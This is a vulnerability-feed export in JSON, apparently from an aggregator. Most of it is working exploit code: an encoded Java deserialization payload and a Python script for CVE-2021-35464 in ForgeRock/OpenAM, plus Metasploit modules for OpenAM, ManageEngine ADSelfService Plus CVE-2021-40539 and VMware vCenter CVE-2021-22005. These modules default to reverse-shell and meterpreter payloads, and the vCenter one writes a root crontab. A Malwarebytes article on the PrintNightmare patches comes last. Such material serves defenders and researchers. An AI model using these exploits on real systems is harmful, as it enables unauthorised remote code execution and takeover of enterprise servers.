QAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlz
dHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_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 \n \n## Ignore unsigned certs, if any because OpenAM is default HTTP \nssl._create_default_https_context = ssl._create_unverified_context \n \ndef checkParams(options, args): \nif args: sHost = args[0] \nelse: \nsHost = input('[?] Please enter the URL ['+sURL+'] : ') \nif sHost == '': sHost = sURL \nif not sHost[-1:] == '/': sHost += '/' \nif not sHost[:4].lower() == 'http': sHost = 'http://' + sHost \nif options.command: sCMD = options.command \nelse: sCMD = '' \nif options.proxy: sProxy = options.proxy \nelse: sProxy = '' \nreturn (sHost, sCMD, sProxy) \n \ndef findEndpoint(oOpener, sHost, sProxy): \ndef testEndpoint(sURL): \noRequest = urllib.request.Request(sURL) \nif sProxy: oRequest.set_proxy(sProxy, 'http') \ntry: oResponse = oOpener.open(oRequest, timeout = iTimeout) \nexcept: return False \nif oResponse.code == 200: \nif 'ForgeRock' in oResponse.read().decode(errors='ignore'): \nprint('[+] Found potential vulnerable endpoint: ' + sURL) \nreturn True \nreturn False \n \nif testEndpoint(sHost + sEndpoint): return sHost + sEndpoint \nelif testEndpoint(sHost + 'openam/' + sEndpoint): return sHost + 'openam/' + sEndpoint \nelif testEndpoint(sHost + 'OpenAM/' + sEndpoint): return sHost + 'OpenAM/' + sEndpoint \nelif testEndpoint(sHost + 'openam/ccversion/Version'): return sHost + 'openam/ccversion/Version' \nelif testEndpoint(sHost + 'OpenAM/ccversion/Version'): return sHost + 'OpenAM/ccversion/Version' 
\nelse: return '' \n \ndef testVuln(oOpener, sURL, sProxy): \noResponse = runCmd(oOpener, sURL, sProxy, 'echo CVE-2021-35464') \n## The response is actually not well formed HTTP, needs manual formatting \nbResp = bytearray(15) ## \"CVE-2021-35464\\n\" should be 15 bytes \ntry: oResponse.readinto(bResp) \nexcept: pass \n#print(bResp.split(b'\\x00')[0]) \nif 'CVE-2021-35464' in bResp.decode(): return True \nelse: return False \n \ndef runVuln(oOpener, sURL, sProxy, sCMD): \noResponse = runCmd(oOpener, sURL, sProxy, sCMD) \n## The response is actually not well formed HTTP, needs manual formatting \nbResp = bytearray(4096) \ntry: oResponse.readinto(bResp) \nexcept: pass ## The readinto still should have worked \nsResp = bResp.split(b'\\x00')[0].decode() \nprint(sResp) \n \ndef runCmd(oOpener, sURL, sProxy, sCMD): \noData = b'jato.pageSession=' + strSerializedPayload \noHeaders = {'cmd' : sCMD} \noRequest = urllib.request.Request(url = sURL, headers = oHeaders, data = oData) \nif sProxy: oRequest.set_proxy(sProxy, 'http') \nreturn oOpener.open(oRequest, timeout = iTimeout) \n \ndef main(): \nusage = ( \n'usage: %prog [options] URL \\n' \n'Example: CVE-2021-35464.py -c id http://192.168.0.100:7080/openam\\n' \n'Example: CVE-2021-35464.py -c dir -p 127.0.0.1:8080 http://192.168.0.100:7080/openam\\n' \n'When in doubt, just enter a single IP address' \n) \n \nparser = optparse.OptionParser(usage=usage) \nparser.add_option('--command', '-c', dest='command', help='Optional: The command to run remotely') \nparser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080') \n \n## Get or ask for the vars \n(options, args) = parser.parse_args() \n(sHost, sCMD, sProxy) = checkParams(options, args) \n \n## Verify reachability \nprint('[!] 
Verifying reachability of ' + sHost) \noOpener = urllib.request.build_opener() \noRequest = urllib.request.Request(sHost) \nif sProxy: oRequest.set_proxy(sProxy, 'http') \ntry: oResponse = oOpener.open(oRequest, timeout = iTimeout) \nexcept urllib.error.HTTPError: pass \nexcept: sys.exit('[-] Error, host ' + sHost + ' seems to be unreachable') \nprint('[+] Endpoint ' + sHost + ' reachable') \n \n## Find endpoint \nprint('[!] Finding correct OpenAM endpoint') \nsEndpoint = findEndpoint(oOpener, sHost, sProxy) \nif sEndpoint == '': sys.exit('[-] Error finding the correct OpenAM endpoint or not vulnerable.') \n \n## Verify vulnerability \nif testVuln(oOpener, sEndpoint, sProxy): print('[+] !SUCCESS! Host ' + sHost + ' is vulnerable to CVE-2021-35464') \nelse: sys.exit('[-] Not vulnerable or this implementation does not work') \nif sCMD: \nprint('[+] Running command \"' + sCMD + '\" now:\\n') \nrunVuln(oOpener, sEndpoint, sProxy, sCMD) \nelse: print('[!] All done') \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/163525/forgerock1463-exec.txt"}, {"lastseen": "2021-07-13T16:10:40", "description": "", "cvss3": {}, "published": "2021-07-13T00:00:00", "type": "packetstorm", "title": "ForgeRock / OpenAM Jato Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-13T00:00:00", "id": "PACKETSTORM:163486", "href": "https://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( 
\ninfo, \n'Name' => 'ForgeRock / OpenAM Jato Java Deserialization', \n'Description' => %q{ \nThis module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and \naccess management solution. The vulnerability arises from a Java deserialization flaw in OpenAM\u2019s \nimplementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a \nvulnerable endpoint. Successful exploitation yields code execution on the target system as the service user. \n \nThis vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus \nis susceptible to the same issue. \n}, \n'Author' => [ \n'Michael Stepankin', # Original Discovery and PoC \n'bwatters-r7', # Msf module \n'Spencer McIntyre', # All of the Help \n'jheysel-r7' # Check Method \n], \n'References' => [ \n['CVE', '2021-35464'], \n['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'], \n['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244'] \n], \n'DisclosureDate' => '2021-06-29', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 1, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \nregister_options([ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Base path', '/openam']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => 
normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'), \n'vars_post' => { \n'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13)) \n} \n) \nif res.nil? \nCheckCode::Unknown(\"The target server didn't respond!\") \nelsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL') \nCheckCode::Appears \nelse \nCheckCode::Safe \nend \nend \n \ndef execute_command(cmd, _opts = {}) \ncmd_encapsulated = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\" \nysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'), \n'vars_post' => { \n'jato.pageSession' => Base64.urlsafe_encode64(\"\\x00\" + ysoserial_payload) \n} \n) \nunless res && res.code == 302 \nfail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\") \nend \nprint_good(\"Successfully executed command: #{cmd}\") \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/163486/cve_2021_35464_forgerock_openam.rb.txt"}, {"lastseen": "2021-11-27T05:17:02", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-27T00:00:00", "type": "packetstorm", "title": "ManageEngine 
ADSelfService Plus Authentication Bypass / Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-27T00:00:00", "id": "PACKETSTORM:165085", "href": "https://packetstormsecurity.com/files/165085/ManageEngine-ADSelfService-Plus-Authentication-Bypass-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539', \n'Description' => %q{ \nThis module exploits CVE-2021-40539, a REST API authentication bypass \nvulnerability in ManageEngine ADSelfService Plus, to upload a JAR and \nexecute it as the user running ADSelfService Plus - which is SYSTEM if \nstarted as a service. 
\n}, \n'Author' => [ \n# Discovered by unknown threat actors \n'Antoine Cervoise', # Independent analysis and RCE \n'Wilfried B\u00e9card', # Independent analysis and RCE \n'mr_me', # keytool classloading technique \n'wvu' # Initial analysis and module \n], \n'References' => [ \n['CVE', '2021-40539'], \n['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'], \n['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'], \n['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'], \n['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py'] \n], \n'DisclosureDate' => '2021-09-07', \n'License' => MSF_LICENSE, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, # true if ADSelfService Plus is run as a service \n'Targets' => [ \n['Java Dropper', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8888 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'vars_post' => { \n'methodToCall' => 'previewMobLogo' \n} \n) \n \nunless res \nreturn CheckCode::Unknown('Target failed to respond to check.') \nend \n \nunless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg}) \nreturn CheckCode::Safe('Failed to bypass REST API authentication.') \nend \n \nCheckCode::Vulnerable('Successfully bypassed REST API authentication.') \nend \n \ndef exploit \nupload_payload_jar \nexecute_payload_jar \nend \n \ndef upload_payload_jar \nprint_status(\"Uploading payload JAR: #{jar_filename}\") \n 
\njar = payload.encoded_jar \njar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh \n \nform = Rex::MIME::Message.new \nform.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"') \nform.add_part('yas', nil, nil, 'form-data; name=\"Save\"') \nform.add_part('smartcard', nil, nil, 'form-data; name=\"form\"') \nform.add_part('Add', nil, nil, 'form-data; name=\"operation\"') \nform.add_part(jar.pack, 'application/java-archive', 'binary', \n%(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\")) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'ctype' => \"multipart/form-data; boundary=#{form.bound}\", \n'data' => form.to_s \n) \n \nunless res&.code == 404 \nfail_with(Failure::NotVulnerable, 'Failed to upload payload JAR') \nend \n \n# C:\\ManageEngine\\ADSelfService Plus\\bin (working directory) \nregister_file_for_cleanup(jar_filename) \n \nprint_good('Successfully uploaded payload JAR') \nend \n \ndef execute_payload_jar \nprint_status('Executing payload JAR') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'), \n'vars_post' => { \n'methodToCall' => 'openSSLTool', \n'action' => 'generateCSR', \n# https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html \n'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\" \n} \n) \n \nunless res&.code == 404 \nfail_with(Failure::PayloadFailed, 'Failed to execute payload JAR') \nend \n \nprint_good('Successfully executed payload JAR') \nend \n \ndef jar_filename \n@jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\" \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/165085/manageengine_adselfservice_plus_cve_2021_40539.rb.txt"}, {"lastseen": "2021-10-07T14:18:18", "description": "", "cvss3": 
{}, "published": "2021-10-07T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-07T00:00:00", "id": "PACKETSTORM:164439", "href": "https://packetstormsecurity.com/files/164439/VMware-vCenter-Server-Analytics-CEIP-Service-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload', \n'Description' => %q{ \nThis module exploits a file upload in VMware vCenter Server's \nanalytics/telemetry (CEIP) service to write a system crontab and \nexecute shell commands as the root user. \n \nNote that CEIP must be enabled for the target to be exploitable by \nthis module. CEIP is enabled by default. 
\n}, \n'Author' => [ \n'George Noseevich', # Discovery \n'Sergey Gerasimov', # Discovery \n'VMware', # Initial PoC \n'Derek Abdine', # Analysis \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-22005'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'], \n['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'], \n['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'], \n['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee'] \n], \n'DisclosureDate' => '2021-09-21', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'WfsDelay' => 60 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'), \n'vars_get' => { \n'_c' => '' \n} \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.body == '\"FULL\"' \nreturn CheckCode::Safe('CEIP is not fully enabled.') \nend \n \nCheckCode::Appears('CEIP is fully enabled.') \nend \n \ndef exploit \nprint_status('Creating path traversal') \n \nunless write_file(rand_text_alphanumeric(8..16)) 
\nfail_with(Failure::NotVulnerable, 'Failed to create path traversal') \nend \n \nprint_good('Successfully created path traversal') \n \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \n \nprint_warning(\"Please wait up to #{wfs_delay} seconds for a session\") \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Writing system crontab: #{crontab_path}\") \n \ncrontab_file = crontab(cmd) \nvprint_line(crontab_file) \n \nunless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file) \nfail_with(Failure::PayloadFailed, 'Failed to write system crontab') \nend \n \nprint_good('Successfully wrote system crontab') \nend \n \ndef write_file(path, data = nil) \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'), \n'ctype' => 'application/json', \n'vars_get' => { \n'_c' => '', \n'_i' => \"/#{path}\" \n}, \n'data' => data \n) \n \nreturn false unless res&.code == 201 \n \ntrue \nend \n \ndef crontab(cmd) \n# https://man7.org/linux/man-pages/man5/crontab.5.html \n<<~CRONTAB.strip \n* * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/ \n* * * * * root #{cmd} \nCRONTAB \nend \n \ndef crontab_path \n\"/etc/cron.d/#{crontab_name}.json\" \nend \n \ndef crontab_name \n@crontab_name ||= rand_text_alphanumeric(8..16) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164439/vmware_vcenter_analytics_file_upload.rb.txt"}], "malwarebytes": [{"lastseen": "2021-07-14T12:38:34", "description": "Last week we wrote about [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>), a vulnerability that was supposed to be 
patched but wasn't. After June's Patch Tuesday, researchers found that the patch did not work in every case, most notably on modern domain controllers. Yesterday, Microsoft issued a set of out-of-band patches that aims to set that right by fixing the Windows Print Spooler Remote Code Execution vulnerability listed as [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n### Serious problem\n\nFor Microsoft to publish an out-of-band patch a week before July's Patch Tuesday shows just how serious the problem is.\n\nPrintNightmare allows a standard user on a Windows network to execute arbitrary code on an affected machine, and to elevate their privileges as far as domain admin, by feeding a vulnerable machine a malicious printer driver. The problem was exacerbated by confusion around whether PrintNightmare was a known, patched problem or an entirely new problem. In the event it turned out to be a bit of both.\n\nLast week the Cybersecurity and Infrastructure Security Agency (CISA) urged administrators to [disable the Windows Print Spooler service](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) in domain controllers and systems that don't print.\n\nHowever, the installation of the Domain Controller (DC) role adds a thread to the spooler service that is responsible for removing stale print queue objects. 
If the spooler service is not running on at least one domain controller in each site, then Active Directory has no means to remove old queues that no longer exist.\n\nSo, many organizations were forced to keep the Print Spooler service enabled on some domain controllers, leaving them at risk to attacks using this vulnerability.\n\n### Set of patches\n\nDepending on the Windows version the patch will be offered as:\n\n * [KB5004945](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 2004, version 20H1, and version 21H1\n * [KB5004946](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004946-os-build-18363-1646-out-of-band-18c5ffac-6015-4b3a-ba53-a73c3d3ed505>) for Windows 10 version 1909\n * [KB5004947](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 1809 and Windows Server 2019\n * KB5004949 for Windows 10 version 1803 which is not available yet\n * [KB5004950](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004950-os-build-10240-18969-out-of-band-7f900b36-b3cb-4f5e-8eca-107cc0d91c50>) for Windows 10 version 1507\n * Older Windows versions (Windows 7 SP1, Windows 8.1 Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows Server 2012 R2) will receive a security update that disallows users who are not administrators to install only signed print drivers to a print server.\n\nSecurity updates have not yet been released for Windows 10 version 1607, Windows Server 2016, or Windows Server 2012, but they will also be released soon, according to Microsoft.\n\nThe updates are cumulative and contain all previous fixes as well as protections for [CVE-2021-1675](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675>).\n\n### Not a complete fix\n\nIt is important to note that these patches and updates **only tackle the remote code 
execution (RCE) part** of the vulnerability. Several researchers have confirmed that the local privilege escalation (LPE) vector still works. This means that threat actors and already active malware can still locally exploit the vulnerability to gain SYSTEM privileges.\n\n### Advice\n\nMicrosoft recommends that you install this update immediately on all supported Windows client and server operating systems, starting with devices that currently host the print server role. You also have the option to configure the `RestrictDriverInstallationToAdministrators` registry setting to prevent non-administrators from installing signed printer drivers on a print server. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for more details.\n\n> \u201cThe attack vector and protections in CVE-2021-34527 reside in the code path that installs a printer driver to a Server. The workflow used to install a printer driver from a trusted print server on a client computer uses a different path. In summary, protections in CVE-2021-34527 including the RestrictDriverInstallationToAdministrators registry key do not impact this scenario.\u201d\n\nCISA encourages users and administrators to review the Microsoft Security Updates as well as CERT/CC Vulnerability Note [VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\n### Impact of the updates\n\nSo, the vulnerability lies in the normal procedure that allows users to install a printer driver on a server. A printer driver is in essence an executable like any other. And allowing users to install an executable of their choice is asking for problems. Especially combined with a privilege escalation vulnerability that anyone can use to act with SYSTEM privileges. 
The updates, patches, and some of the workarounds are all designed to limit the possible executables since they need to be signed printer drivers.\n\nFor a detailed and insightful diagram that shows GPO settings and registry keys administrators can check whether their systems are vulnerable, have a look at this flow chart diagram, courtesy of [Will Dormann](<https://twitter.com/wdormann>).\n\n> This is my current understanding of the [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) exploitability flowchart. \nThere's a small disagreement between me and MSRC at the moment about UpdatePromptSettings vs. NoWarningNoElevationOnUpdate, but I think it doesn't matter much as I just have both for now. [pic.twitter.com/huIghjwTFq](<https://t.co/huIghjwTFq>)\n> \n> -- Will Dormann (@wdormann) [July 7, 2021](<https://twitter.com/wdormann/status/1412906574998392840?ref_src=twsrc%5Etfw>)\n\n### Information for users that applied 0patch\n\nIt is worth mentioning for the users that applied the PrintNightmare [micropatches by 0patch](<https://blog.0patch.com/2021/07/free-micropatches-for-printnightmare.html>) that according to 0patch it is better not to install the Microsoft patches. They posted on Twitter that the Microsoft patches that only fix the RCE part of the vulnerability disable the 0patch micropatch which fixes both the LPE and RCE parts of the vulnerability.\n\n> If you're using 0patch against PrintNightmare, DO NOT apply the July 6 Windows Update! Not only does it not fix the local attack vector but it also doesn't fix the remote vector. However, it changes localspl.dll, which makes our patches that DO fix the problem stop applying. 
<https://t.co/osoaxDVCoB>\n> \n> -- 0patch (@0patch) [July 7, 2021](<https://twitter.com/0patch/status/1412826130051174402?ref_src=twsrc%5Etfw>)\n\n### Update July 9, 2021\n\nOnly a little more than 12 hours after the release a researcher has found an exploit that works on a patched system under special circumstances. [Benjamin Delpy](<https://twitter.com/gentilkiwi?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1412771368534528001%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Farstechnica.com%2Fgadgets%2F2021%2F07%2Fmicrosofts-emergency-patch-fails-to-fix-critical-printnightmare-vulnerability%2F>) showed an exploit working against a Windows Server 2019 that had installed the out-of-band patch. In a demo Delpy shows that the update fails to fix vulnerable systems that use certain settings for a feature called [point and print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>), which makes it easier for network users to obtain the printer drivers they need.\n\nIn Microsoft's defense the advisory for [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) contains a note in the FAQ stating that:\n\n> Point and Print is not directly related to this vulnerability, but certain configurations make systems vulnerable to exploitation.\n\n### Update July 14, 2021\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it is aware of active exploitation, by multiple threat actors, of the PrintNightmare vulnerability. \n\nCISA has determined that this vulnerability poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action. The actions CISA lists are required actions for the agencies. 
The determination that these actions are necessary is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise, and the high potential for a compromise of agency information systems. Exploitation of the vulnerability allows an attacker to remotely execute code with system level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization. \n\nThe post [UPDATED: Patch now! Emergency fix for PrintNightmare released by Microsoft](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T14:17:31", "type": "malwarebytes", "title": "UPDATED: Patch now! 
